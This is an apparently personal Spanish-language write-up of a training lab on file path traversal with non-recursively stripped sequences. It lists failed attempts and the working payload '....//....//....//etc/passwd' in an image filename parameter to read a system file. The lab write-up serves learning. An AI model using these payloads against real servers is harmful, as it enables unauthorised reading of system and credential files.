PortfolioBug Hunter ProfileGithub

🦉Laboratorio: recorrido de ruta de archivo , secuencias transversales eliminadas de forma no recursiv

  • Entonces vamos a interceptar la url de la imagen, la petición

Aqui la tenemos, vamos a empezar a modificar la url, para ver si podemos obtener la secuencia transversal de forma no recursiva →

  • El problema que estuve teniendo fue que intenté probar de todas las formas, sin embargo no hice la secuencia repetidas veces, por ello creía que no iba a poder encontrar la solución.

Las “soluciones” que probé yo:

  1. /image?filename=12.jpg&….//etc/passwd

  2. /image?filename=&….//etc/passwd

  3. /image?filename=…./\etc/passwd

  4. /image?filename=….//etc/passwd

  5. /image?filename=….//….//etc/passwd → aqui me falto un recorrido más para la solución. ☹️

  6. /image?filename=etc/passwd….//….//

Solución correcta:

  1. /image?filename=….//….//….//etc/passwdesta si era. 😄

Eso es todo gracias por leerme :)

PreviousLaboratorio: File path traversal, traversal sequences blocked with absolute path bypassNextLaboratorio: File path traversal, traversal sequences stripped with superfluous URL-decode

Last updated